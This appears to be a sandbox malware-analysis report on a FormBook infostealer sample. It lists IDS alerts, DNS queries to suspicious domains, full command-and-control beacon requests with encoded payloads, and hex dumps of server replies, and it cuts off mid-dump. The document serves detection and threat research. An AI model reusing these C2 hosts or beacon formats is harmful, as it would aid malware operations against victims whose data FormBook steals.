            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49779 -> 66.29.132.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49781 -> 202.92.5.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 66.29.132.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49724 -> 202.92.5.23:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49734 -> 103.230.159.86:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49734 -> 103.230.159.86:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49743 -> 209.74.77.109:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49748 -> 104.21.27.59:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49767 -> 154.23.184.194:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.beylikduzu616161.xyz
            Source: DNS query: www.dating-apps-az-dn5.xyz
            Source: Joe Sandbox ViewIP Address: 194.195.220.41 194.195.220.41
            Source: Joe Sandbox ViewIP Address: 209.74.77.109 209.74.77.109
            Source: Joe Sandbox ViewASN Name: NEXINTO-DE NEXINTO-DE
            Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: global trafficHTTP traffic detected: GET /vluw/?h7i-=tZtx&IUY=Qny9vPKZpQxlYqiENFuqCTovdcuESvtoVbvPUumHvVgYiZzoUIcT00pHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G7wrUY6Sf9n2bmecGwgkPVQzmhsXBPGmPUbE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.zkdamdjj.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
            Source: global trafficHTTP traffic detected: GET /k6yn/?h7i-=tZtx&IUY=tNpa1p20+8HvGGTFO8FkkeyNbaBnDGg9aQgmgnvjgQBap2YCvQVXfu0lL5fLGicbWcSejDEnKeIqzsVAbPYV9SmH+8E676AUWIvi1rNZuDh4+Pmog8xR0m4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.orbitoasis.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
            Source: global trafficHTTP traffic detected: GET /cboa/?IUY=af1TSyH9ZKWDWOLhq+2G7N4mtZVzPtI6MbDiaGUzr5LnkxoPx276h73cE37euV2f02htPG9gF0GAKqxhPgTdcj/L3zWCPcCWIrrHTA4XRmlAzoY0158k8yU=&h7i-=tZtx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.thaor56.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
            Source: global trafficHTTP traffic detected: GET /0gis/?h7i-=tZtx&IUY=aMrcg/vn2G/nVrncRMm9sg/9wEZLpPTCuDhUOTj2ocWrQXkoPHFbln5FmLoTaWY74KRoWkXSZUSbj2dC1qWbeU//egp4ZoVrxwEcZqidFa5edjFbZGfsKVU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.earbudsstore.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
            Source: global trafficHTTP traffic detected: GET /bwyw/?IUY=zeqgG3zf3rSD22A0zF5wS4zK0N2/jqmuTT/213oW5xKBpEmM0JRqJaWJcKUMxr+7Esc9obOTS2jlvNaYH8wfaL2cIGBALQwkeJY/zX4xE0yHRYNxEJGWTyE=&h7i-=tZtx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.superiorfencing.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
            Source: global trafficHTTP traffic detected: GET /2nga/?h7i-=tZtx&IUY=Q2EbwnYhq4vEVEYxQpA6sukiKEquLN4lBliPtc8X0AIyDwowOCFGn/261E09vvaaF3LvgpjgW8Wvr6GWd63UOpRMNSn6wTuIcZ+YR2jjC7j32XIp3HKhGr0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.beylikduzu616161.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
            Source: global trafficHTTP traffic detected: GET /gxyh/?IUY=xivIugper8hSVuoO04jTuRZuLjO4xxMGnAUBMzrp/j5qvAoCvNj6F2x9r/oRQ/YEeKRSLhAnFUBxmqELIOT+5QAFQKguKJNKmb5QmpQkz0/MRH6o2CbFa8M=&h7i-=tZtx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.zxyck.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
            Source: global trafficHTTP traffic detected: GET /n9b0/?IUY=A8VrqyfvUbO/Hw2LPQ4NsXlD/s5AVNHZj5dGp0FbdWJo87i+fAzGqYzWbkPjYDkNrmWhazG0hIjSjfnpkftd/stSTEWpskOuncpocPTypnt0UF6pA8n7oU4=&h7i-=tZtx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dailyfuns.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
            Source: global trafficHTTP traffic detected: GET /1ag2/?IUY=4VB/N4F6tibqC9FQILl1J+73qE/jxtiF4YtEqiz3GsaSMOHPZtZI38VqeQNXmBxLoc2gIm7YkXHcJ/CISLsxf+n8D3thRkzZ5amN14yu7swz/i/g4nn3MSQ=&h7i-=tZtx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mydreamdeal.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
            Source: global trafficHTTP traffic detected: GET /vluw/?h7i-=tZtx&IUY=Qny9vPKZpQxlYqiENFuqCTovdcuESvtoVbvPUumHvVgYiZzoUIcT00pHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G7wrUY6Sf9n2bmecGwgkPVQzmhsXBPGmPUbE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.zkdamdjj.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
            Source: global trafficHTTP traffic detected: GET /k6yn/?h7i-=tZtx&IUY=tNpa1p20+8HvGGTFO8FkkeyNbaBnDGg9aQgmgnvjgQBap2YCvQVXfu0lL5fLGicbWcSejDEnKeIqzsVAbPYV9SmH+8E676AUWIvi1rNZuDh4+Pmog8xR0m4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.orbitoasis.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
            Source: global trafficDNS traffic detected: DNS query: www.zkdamdjj.shop
            Source: global trafficDNS traffic detected: DNS query: www.75178.club
            Source: global trafficDNS traffic detected: DNS query: www.orbitoasis.online
            Source: global trafficDNS traffic detected: DNS query: www.thaor56.online
            Source: global trafficDNS traffic detected: DNS query: www.earbudsstore.shop
            Source: global trafficDNS traffic detected: DNS query: www.superiorfencing.net
            Source: global trafficDNS traffic detected: DNS query: www.beylikduzu616161.xyz
            Source: global trafficDNS traffic detected: DNS query: www.zxyck.net
            Source: global trafficDNS traffic detected: DNS query: www.dailyfuns.info
            Source: global trafficDNS traffic detected: DNS query: www.mydreamdeal.click
            Source: global trafficDNS traffic detected: DNS query: www.maitreyatoys.world
            Source: global trafficDNS traffic detected: DNS query: www.dating-apps-az-dn5.xyz
            Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
            Source: global trafficDNS traffic detected: DNS query: www.nieuws-july202541.sbs
            Source: global trafficDNS traffic detected: DNS query: www.wcq77.top
            Source: global trafficDNS traffic detected: DNS query: www.oztalkshw.store
            Source: unknownHTTP traffic detected: POST /k6yn/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.orbitoasis.onlineOrigin: http://www.orbitoasis.onlineCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 200Connection: closeReferer: http://www.orbitoasis.online/k6yn/User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like GeckoData Raw: 49 55 59 3d 67 50 42 36 32 5a 47 32 79 50 65 30 50 6d 62 50 61 63 6c 65 76 75 48 76 45 39 4e 61 4c 32 51 6c 49 53 38 74 31 48 76 4b 75 31 68 76 34 78 67 47 6f 42 64 61 4a 35 67 59 4f 34 58 56 46 69 41 47 57 73 76 6d 36 51 67 68 59 73 4d 4a 31 65 74 30 50 4b 4a 69 30 41 61 49 35 35 6f 66 69 50 34 50 66 4b 75 57 69 37 56 4e 67 47 46 59 31 39 6a 73 6e 4f 41 67 7a 47 72 33 38 6b 59 54 6f 42 6b 5a 69 72 5a 6a 30 4a 6d 46 32 6c 46 34 34 59 62 74 6c 32 52 46 6b 67 4d 32 44 48 48 6c 66 4a 42 58 38 78 36 4e 39 51 55 59 6d 74 6d 4d 44 33 61 4a 6d 6f 36 45 6f 34 32 47 45 65 78 4f 4e 47 4d 4e 79 41 3d 3d Data Ascii: IUY=gPB62ZG2yPe0PmbPaclevuHvE9NaL2QlIS8t1HvKu1hv4xgGoBdaJ5gYO4XVFiAGWsvm6QghYsMJ1et0PKJi0AaI55ofiP4PfKuWi7VNgGFY19jsnOAgzGr38kYToBkZirZj0JmF2lF44Ybtl2RFkgM2DHHlfJBX8x6N9QUYmtmMD3aJmo6Eo42GEexONGMNyA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 04 Dec 2024 16:11:33 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 8f 2f 33 ab 2b eb b7 df 7e 7b fc 27 76 c9 ac 0d 85 1b 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 35 9d 6f bf 5d 7e 26 6e 65 82 19 55 7e ef 1e eb b0 79 ba 63 b2 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 59 94 6e f5 54 57 de 3d 79 f7 29 1d d3 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 14 a6 9f 98 ff c8 0a ae cb c3 c2 2d af 96 20 ef a8 a7 66 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 9a f1 7d 69 9b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 ce aa c1 34 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab da ca 9c d3 e0 ef 97 a9 fd 67 df 3c a0 9d 7b cf 4c c2 f8 f4 30 a0 0a b0 ed 97 81 e0 c6 8d 5b 85 b6 f9 65 50 9a 69 79 5f ba 45 e8 fd e5 c7 65 65 78 76 1f 06 28 91 77 ef 07 e3 30 75 ef 03 37 f4 83 0a 0c 7f 25 30 72 38 46 09 6c f2 7e 96 65 da 91 5f f4 32 00 13 c5 59 f1 30 f8 67 ef d2 de 4f 7b 1d c3 a6 38 86 23 ef c7 72 d3 71 c2 d4 7f 18 dc f4 27 66 e1 87 e9 bb ee ff fc ce 7e e9 da 55 98 a5 5f 80 e8 59 e5 16 37 fa 70 c2 32 8f 4d a0 0b 2b ce ec e8 ff 60 bb af 3d fe 4c a0 91 db 9d 9e 99 bc 8f 5d 0f 68 c9 ac ab ec fd 66 2f c3 c5 b3 16 7f 1c 7f 93 7d 80 22 d7 16 78 93 f4 2b 40 64 9e a5 a5 7b 1f a6 5e 76 23 e8 ab 5e 99 4b 7b db fb 6a 79 59 99 55 5d 02 eb 38 ee cd e2 0b 6a 9e cd 3f 44 90 7f f9 a3 d5 85 6b 96 59 fa f9 7a 6c 78 bd be 87 e4 67 26 b8 e2 ec a2 53 bb ba c8 f5 e5 bb 65 81 bc fd 5e f7 7d a0 b8 d9 f0 55 5a e4 d2 3e e4 b7 c7 52 0f 0c e0 78 1f a8 eb 0a ad 85 9b bb 26 b0 19 08 23 cf 3f df c8 f5 ec 5f cd 7c dd 15 9b e0 14 41 bd 9f f6 3a 36 bd b4 b7 b1 2b 29 6f 39 32 3f 11 ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 95 c2 f4 cd 95 27 f8 27 40 bb b6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 4d d8 5e 5f 57 58 42 47 d7 83 57 9a 78 47 ff 56 0d bd b9 ef 1d d7 ce 0a b3 b7 df c3 00 84 14 b7 e8 83 d0 fb 8d 5e 35 0e e2 11 cd 5c 59 e3 d3 7d 1e 82 ac 71 8b 2b 7c bd 67 e3 c1 cb ec ba fc 7c d8 04 71 a6 b9 f5 9c 57 26 30 6a 44 4c 46 6f 0c 5e 31 f1 39 8a 5f e3 da 47 86 fa 05 35 d6 f1 8d 6d be 7b 5a 98 5e 62 f6 07 31 2f 0e cb ea fe 92 56 7a c0 a7 ee 20 ab ab 32 04 01 a1 ff 78 63 bf 37 e4 2b 77 37 c1 f8 3b bc ae fa df a4 05 3c c5 e1 0d 5b 5e 9c f5 fe d5 47 c6 f7 3b 5c 2c 6d c6 a1 0f 8c 6c 83 13 82 5b bc 8d bf 91 fc 7a e3 37 2f a0 ff 68 a7 4b c2 05 39 ea b3 18 d6 07 82 fb 30 31 fd 5b 33 7e 17 ea d3 d8 7b 59 da 9f 72 40 82 ba 95 af cf b9 ed 4b 7e b4 b2 d8 79 93 a2 d7 e3 b5 94 3f ea a0 cd 0a e7 de 02 18 89 40 8e ea ff dc 9b 71 fc 9e c0 2f 49 05 92 3a 00 f7 00 e8 0a 64 8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 04 Dec 2024 16:11:36 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 8f 2f 33 ab 2b eb b7 df 7e 7b fc 27 76 c9 ac 0d 85 1b 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 35 9d 6f bf 5d 7e 26 6e 65 82 19 55 7e ef 1e eb b0 79 ba 63 b2 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 59 94 6e f5 54 57 de 3d 79 f7 29 1d d3 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 14 a6 9f 98 ff c8 0a ae cb c3 c2 2d af 96 20 ef a8 a7 66 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 9a f1 7d 69 9b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 ce aa c1 34 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab da ca 9c d3 e0 ef 97 a9 fd 67 df 3c a0 9d 7b cf 4c c2 f8 f4 30 a0 0a b0 ed 97 81 e0 c6 8d 5b 85 b6 f9 65 50 9a 69 79 5f ba 45 e8 fd e5 c7 65 65 78 76 1f 06 28 91 77 ef 07 e3 30 75 ef 03 37 f4 83 0a 0c 7f 25 30 72 38 46 09 6c f2 7e 96 65 da 91 5f f4 32 00 13 c5 59 f1 30 f8 67 ef d2 de 4f 7b 1d c3 a6 38 86 23 ef c7 72 d3 71 c2 d4 7f 18 dc f4 27 66 e1 87 e9 bb ee ff fc ce 7e e9 da 55 98 a5 5f 80 e8 59 e5 16 37 fa 70 c2 32 8f 4d a0 0b 2b ce ec e8 ff 60 bb af 3d fe 4c a0 91 db 9d 9e 99 bc 8f 5d 0f 68 c9 ac ab ec fd 66 2f c3 c5 b3 16 7f 1c 7f 93 7d 80 22 d7 16 78 93 f4 2b 40 64 9e a5 a5 7b 1f a6 5e 76 23 e8 ab 5e 99 4b 7b db fb 6a 79 59 99 55 5d 02 eb 38 ee cd e2 0b 6a 9e cd 3f 44 90 7f f9 a3 d5 85 6b 96 59 fa f9 7a 6c 78 bd be 87 e4 67 26 b8 e2 ec a2 53 bb ba c8 f5 e5 bb 65 81 bc fd 5e f7 7d a0 b8 d9 f0 55 5a e4 d2 3e e4 b7 c7 52 0f 0c e0 78 1f a8 eb 0a ad 85 9b bb 26 b0 19 08 23 cf 3f df c8 f5 ec 5f cd 7c dd 15 9b e0 14 41 bd 9f f6 3a 36 bd b4 b7 b1 2b 29 6f 39 32 3f 11 ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 95 c2 f4 cd 95 27 f8 27 40 bb b6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 4d d8 5e 5f 57 58 42 47 d7 83 57 9a 78 47 ff 56 0d bd b9 ef 1d d7 ce 0a b3 b7 df c3 00 84 14 b7 e8 83 d0 fb 8d 5e 35 0e e2 11 cd 5c 59 e3 d3 7d 1e 82 ac 71 8b 2b 7c bd 67 e3 c1 cb ec ba fc 7c d8 04 71 a6 b9 f5 9c 57 26 30 6a 44 4c 46 6f 0c 5e 31 f1 39 8a 5f e3 da 47 86 fa 05 35 d6 f1 8d 6d be 7b 5a 98 5e 62 f6 07 31 2f 0e cb ea fe 92 56 7a c0 a7 ee 20 ab ab 32 04 01 a1 ff 78 63 bf 37 e4 2b 77 37 c1 f8 3b bc ae fa df a4 05 3c c5 e1 0d 5b 5e 9c f5 fe d5 47 c6 f7 3b 5c 2c 6d c6 a1 0f 8c 6c 83 13 82 5b bc 8d bf 91 fc 7a e3 37 2f a0 ff 68 a7 4b c2 05 39 ea b3 18 d6 07 82 fb 30 31 fd 5b 33 7e 17 ea d3 d8 7b 59 da 9f 72 40 82 ba 95 af cf b9 ed 4b 7e b4 b2 d8 79 93 a2 d7 e3 b5 94 3f ea a0 cd 0a e7 de 02 18 89 40 8e ea ff dc 9b 71 fc 9e c0 2f 49 05 92 3a 00 f7 00 e8 0a 64 8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 04 Dec 2024 16:11:39 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 8f 2f 33 ab 2b eb b7 df 7e 7b fc 27 76 c9 ac 0d 85 1b 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 35 9d 6f bf 5d 7e 26 6e 65 82 19 55 7e ef 1e eb b0 79 ba 63 b2 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 59 94 6e f5 54 57 de 3d 79 f7 29 1d d3 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 14 a6 9f 98 ff c8 0a ae cb c3 c2 2d af 96 20 ef a8 a7 66 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 9a f1 7d 69 9b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 ce aa c1 34 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab da ca 9c d3 e0 ef 97 a9 fd 67 df 3c a0 9d 7b cf 4c c2 f8 f4 30 a0 0a b0 ed 97 81 e0 c6 8d 5b 85 b6 f9 65 50 9a 69 79 5f ba 45 e8 fd e5 c7 65 65 78 76 1f 06 28 91 77 ef 07 e3 30 75 ef 03 37 f4 83 0a 0c 7f 25 30 72 38 46 09 6c f2 7e 96 65 da 91 5f f4 32 00 13 c5 59 f1 30 f8 67 ef d2 de 4f 7b 1d c3 a6 38 86 23 ef c7 72 d3 71 c2 d4 7f 18 dc f4 27 66 e1 87 e9 bb ee ff fc ce 7e e9 da 55 98 a5 5f 80 e8 59 e5 16 37 fa 70 c2 32 8f 4d a0 0b 2b ce ec e8 ff 60 bb af 3d fe 4c a0 91 db 9d 9e 99 bc 8f 5d 0f 68 c9 ac ab ec fd 66 2f c3 c5 b3 16 7f 1c 7f 93 7d 80 22 d7 16 78 93 f4 2b 40 64 9e a5 a5 7b 1f a6 5e 76 23 e8 ab 5e 99 4b 7b db fb 6a 79 59 99 55 5d 02 eb 38 ee cd e2 0b 6a 9e cd 3f 44 90 7f f9 a3 d5 85 6b 96 59 fa f9 7a 6c 78 bd be 87 e4 67 26 b8 e2 ec a2 53 bb ba c8 f5 e5 bb 65 81 bc fd 5e f7 7d a0 b8 d9 f0 55 5a e4 d2 3e e4 b7 c7 52 0f 0c e0 78 1f a8 eb 0a ad 85 9b bb 26 b0 19 08 23 cf 3f df c8 f5 ec 5f cd 7c dd 15 9b e0 14 41 bd 9f f6 3a 36 bd b4 b7 b1 2b 29 6f 39 32 3f 11 ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 95 c2 f4 cd 95 27 f8 27 40 bb b6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 4d d8 5e 5f 57 58 42 47 d7 83 57 9a 78 47 ff 56 0d bd b9 ef 1d d7 ce 0a b3 b7 df c3 00 84 14 b7 e8 83 d0 fb 8d 5e 35 0e e2 11 cd 5c 59 e3 d3 7d 1e 82 ac 71 8b 2b 7c bd 67 e3 c1 cb ec ba fc 7c d8 04 71 a6 b9 f5 9c 57 26 30 6a 44 4c 46 6f 0c 5e 31 f1 39 8a 5f e3 da 47 86 fa 05 35 d6 f1 8d 6d be 7b 5a 98 5e 62 f6 07 31 2f 0e cb ea fe 92 56 7a c0 a7 ee 20 ab ab 32 04 01 a1 ff 78 63 bf 37 e4 2b 77 37 c1 f8 3b bc ae fa df a4 05 3c c5 e1 0d 5b 5e 9c f5 fe d5 47 c6 f7 3b 5c 2c 6d c6 a1 0f 8c 6c 83 13 82 5b bc 8d bf 91 fc 7a e3 37 2f a0 ff 68 a7 4b c2 05 39 ea b3 18 d6 07 82 fb 30 31 fd 5b 33 7e 17 ea d3 d8 7b 59 da 9f 72 40 82 ba 95 af cf b9 ed 4b 7e b4 b2 d8 79 93 a2 d7 e3 b5 94 3f ea a0 cd 0a e7 de 02 18 89 40 8e ea ff dc 9b 71 fc 9e c0 2f 49 05 92 3a 00 f7 00 e8 0a 64 8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Wed, 04 Dec 2024 16:11:41 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 